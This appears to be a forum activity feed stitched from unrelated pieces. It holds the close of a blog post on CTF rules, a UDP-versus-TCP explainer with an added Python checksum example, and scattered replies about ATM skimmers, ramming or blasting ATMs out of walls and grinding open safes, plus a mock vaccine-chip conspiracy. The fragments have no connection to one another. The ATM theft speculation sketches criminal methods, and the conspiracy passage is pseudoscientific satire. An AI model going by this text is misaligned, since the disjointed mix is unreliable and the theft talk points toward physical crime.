Before you go on to playing CTFs (and having the time of your life!), here are a few sacred rules of CTF participation that you should keep in mind.

First, absolutely do not post solutions and flags online! The purpose of CTFs is to help people become better hackers through the mental struggle of solving challenges. Giving solutions away is denying the chance for others to learn.

On the other hand, you also should not try to google solutions or ask for flags online. You can ask for help, discuss with others or even collaborate in solving a challenge, but asking or googling for solutions takes away from the experience. Even if you try to understand the solution, it is not the same as working hard and finally finding the answer yourself!

Have Fun!

CTFs are a great hobby that ultimately makes you a better hacker. In fact, many of the most skilled hackers came from CTF backgrounds. I hope you’ll find the experience rewarding as well. Best of luck and have fun!

Categories: Hacking
Updated: September 10, 2020

Source: https://vkili.github.io/blog/hacking/intro-ctf/
-
Where should we register? On that opensc? Dread? I have no idea which ones they are.
-
For those interested in presenting, we are waiting for CFP submissions: https://rstcon.com/cfp/
-
Yes, in general those who risk their freedom this way will probably take as many precautions as possible, both to make sure the attack works and that they are not caught. Speaking of which, some years ago I talked with someone at a bank who handled the physical security of ATMs. And he told me something very interesting about skimmers (those devices that copy the data from your card, from the magnetic stripe). When I go to an ATM I pull like a peasant on the part where the card is inserted and on the keypad. And he said this: "If you ever find a skimmer, put it back and walk away. Then, if you want, you can notify the police. That skimmer costs them a lot of money, up to $10,000, and for it they would be willing to cut you up in broad daylight. There is certainly someone around; they don't leave and let their device sit unattended." What others abroad do, filming themselves discovering such things, can be dangerous.
-
I don't think the "necessary information" is a problem. As far as I knew, you could buy an ATM yourself, I think it was around $5,000, from eBay, AliExpress or whatever. For the calculations, the wall they are set into matters, in order to figure out how much explosive to use, and it's good that they don't use too much... Actually I don't think it's even necessary; others in the USA pulled them out directly with those big cars of theirs (5L engine, I think it pulls). I'm curious how they then break open the safe. It can certainly be done, probably even with an angle grinder (and many discs replaced).
-
RST Con will take place on 20 November 2020 (Friday). We also await suggestions regarding the "official site": https://rstcon.com/ We are also waiting for applications for presentations.
-
Yes, it's about an inflammation of the spinal column. It was written somewhere that this "happens" when testing vaccines. The chip has too many transistors and its bio-electro-magnetic waves interfere with the encephalo-neurological waves transmitted by the spinal column into the body (those Keep-Alive messages between the spine and the organs, used to determine the downtime of some of them). A kind of Human Jammer, this chip... Man, I'd be good at making one of those conspiracy-site garbage pages, I'd make a fortune.
-
UDP vs. TCP: A Quick Comparison

Sep 7 2020

Some background you may or may not care about

I took a networking class in college. It wasn’t a great experience, as the professor was at the school really just to pursue research, leaving us peasant students to 5-question long exams, each 25% of our grade and with .05% of the content from 200+ long slide decks. Needless to say, it wasn’t a very useful class. So here I am, some number of years into my cybersecurity career, able to recognize and speak about different network protocols at fluctuating levels depending on the day. It’s time to change that. I want to understand, like really understand what’s going on. This blog post is going to cover some of the most fundamental concepts in the networking world: UDP and TCP, two transport-level protocols.

UDP (User Datagram Protocol)

UDP is a connectionless, message-oriented protocol. It functions through the sending and receiving of packets without having to establish a connection between a client and server. As a result, once a message has been sent, there is no further communication with the message receiver. Additionally, the packets are not numbered. This means that packets are not guaranteed to arrive in order, or even to arrive at all. UDP does not wait for acknowledgement of message receipt, it simply yeets the message and moves on.

Due to its connectionless nature, UDP is good for real-time information delivery. As messages are told to be transmitted, they are transmitted. Packets may be dropped due to lack of congestion control. Because the sender isn’t waiting for an ack, nor is the receiver going to send an ack, dropped packets will go unnoticed by both the client and server. This is okay in certain real-time examples, such as streaming. A momentary glitch will not deter a viewer. This also means that UDP is able to support broadcasting.

Error checking in UDP occurs through a 16-bit checksum. The checksum is used as follows: the sender computes the checksum corresponding to the data being sent and stores it in the header; upon receipt, the receiver computes the checksum using the received data and compares it to the checksum in the header. It’s important to note that the checksum is mandatory in IPv6 but not IPv4.

The UDP segment, or the data portion, of an IP packet includes an 8-byte header followed by variable length data. The header is composed as follows:
- The first 4 bytes of the header store the port numbers of the source and destination.
- The next 2 bytes of the header store the length of the UDP segment.
- The last 2 bytes of the header store the checksum.

TCP/IP (Transmission Control Protocol)

TCP is a handshake-based, connection-oriented protocol. TCP provides a continuous flow of data by sending numbered packets, which ensures correct receipt order. While this takes more time than UDP, which sends as instructed and receives as is, it makes TCP the more reliable transport protocol of the two. If packets are dropped, they can be recognized as missing and then retransmitted. The reliability provided by TCP makes it a choice protocol in situations requiring packet receipt acknowledgement and/or ensured packet delivery. However, this reliability and congestion control behavior comes at a cost of overhead. TCP is slower than UDP due to the latency created by establishing and maintaining connections.

Checksum use is required by TCP, for both IPv4 and IPv6. This ensures error detection regardless of IP version.

A TCP header is between 20 and 60 bytes. Like the UDP header, there are reserved bytes for the source and destination port numbers; there is also a field to store the amount of data to be transmitted during the session, and the checksum is included towards the end. The large quantity of additional header space, compared to UDP, is used to store information required to establish connections, maintain connections, and support the acknowledgements required for the reliability aspects (i.e. syn/ack behavior) of the protocol.

TL;DR

UDP is the less reliable protocol, but can be used for real-time data delivery, including broadcasting, due to its constant stream of packet transmission. TCP is a more reliable but slower data transport protocol used for data transmission between two endpoints. It uses acknowledgements to confirm packet receipt. Both protocols support checksums, which should be utilized for error detection.

Source: https://casey.is/blogging/udpvstcp/
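The 8-byte UDP header and the 16-bit checksum described above, worked through in Python as an added example (not part of the original post). The sample datagram and the two TCP headers are constructed inline, not captured; the addresses and ports are arbitrary. It covers the detail the post leaves out, namely that the UDP checksum is computed over an IPv4 pseudo-header (source and destination address, a zero byte, the protocol number 17 and the UDP length) as well as the segment, that a computed value of 0 is sent as 0xFFFF because 0 means "no checksum" in IPv4, and, for TCP, that the header length is read from the 4-bit data offset, which is what puts it between 20 and 60 bytes. The IPv6 pseudo-header is laid out differently (128-bit addresses, a 32-bit length and the next-header byte) and is not handled here.

```python
import socket
import struct

UDP_PROTOCOL = 17


def ones_complement_sum(data: bytes) -> int:
    """Add 16-bit big-endian words with end-around carry, as the Internet checksum does."""
    if len(data) % 2:
        data += b"\x00"          # odd-length data is padded for the sum only, not on the wire
    total = sum((data[i] << 8) | data[i + 1] for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def udp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """Checksum over the IPv4 pseudo-header (src, dst, 0, proto, length) plus the segment.

    `segment` is the 8-byte header with its checksum field set to 0, followed by the payload.
    """
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, UDP_PROTOCOL, len(segment)))
    csum = 0xFFFF - ones_complement_sum(pseudo + segment)   # one's complement of the sum
    return csum or 0xFFFF     # 0 on the wire means "no checksum" (IPv4 only), so send 0xFFFF


def build_udp(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Header: src port (2) | dst port (2) | length (2) | checksum (2), then the payload."""
    length = 8 + len(payload)
    unchecked = struct.pack("!HHHH", sport, dport, length, 0) + payload
    csum = udp_checksum(src_ip, dst_ip, unchecked)
    return struct.pack("!HHHH", sport, dport, length, csum) + payload


def parse_udp(segment: bytes) -> dict:
    sport, dport, length, csum = struct.unpack("!HHHH", segment[:8])
    return {"sport": sport, "dport": dport, "length": length,
            "checksum": csum, "payload": segment[8:length]}


def verify_udp(src_ip: str, dst_ip: str, segment: bytes):
    """True/False for a checksummed segment; None when an IPv4 sender left the field at zero."""
    fields = parse_udp(segment)
    if fields["checksum"] == 0:
        return None
    zeroed = segment[:6] + b"\x00\x00" + segment[8:fields["length"]]
    return udp_checksum(src_ip, dst_ip, zeroed) == fields["checksum"]


def tcp_header_length(segment: bytes) -> int:
    """TCP header length from the 4-bit data offset (high nibble of byte 12): 20 to 60 bytes."""
    return (segment[12] >> 4) * 4


# Constructed sample traffic (not captured): a small datagram to port 53 between two hosts.
SRC_IP, DST_IP = "192.168.1.10", "192.168.1.20"
DATAGRAM = build_udp(SRC_IP, DST_IP, 12345, 53, b"abcd")

# Constructed TCP headers: SYN with no options (data offset 5 -> 20 bytes) and one with
# 12 bytes of options (data offset 8 -> 32 bytes). Fields: ports, seq, ack, offset,
# flags, window, checksum, urgent pointer.
TCP_NO_OPTIONS = struct.pack("!HHIIBBHHH", 40000, 443, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
TCP_WITH_OPTIONS = struct.pack("!HHIIBBHHH", 40000, 443, 1, 0, 8 << 4, 0x02, 65535, 0, 0) + b"\x00" * 12

if __name__ == "__main__":
    print(parse_udp(DATAGRAM), verify_udp(SRC_IP, DST_IP, DATAGRAM))
    print(tcp_header_length(TCP_NO_OPTIONS), tcp_header_length(TCP_WITH_OPTIONS))
```

Two things worth trying with this: flipping one bit of the payload makes verify_udp return False, but swapping the two 16-bit words "ab" and "cd" leaves the one's-complement sum unchanged and the datagram still verifies. The checksum catches accidental corruption, not deliberate tampering, so it is never a substitute for an integrity mechanism such as DTLS or an authenticated application-layer format. The 16-bit TCP field the post describes as the amount of data for the session is the receive window (bytes 14 and 15), which the sample headers fill with 65535.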
-
But here our money is made of plastic anyway and can be washed (literally), I think. Unless it's something very special that doesn't come off. It's possible.
-
I keep hearing about that thing with marking the money, but is it real? I don't think so many such messes would be made if it were. The money is kept in cassettes, each cassette with a certain type of banknote. But I haven't seen anything else in there (I've seen an ATM opened, up close, let's say). PS: There's another myth according to which the "Brrrrr" when the money is brought out is just an MP3, does anyone have any idea? Actually this is my only real curiosity about ATMs.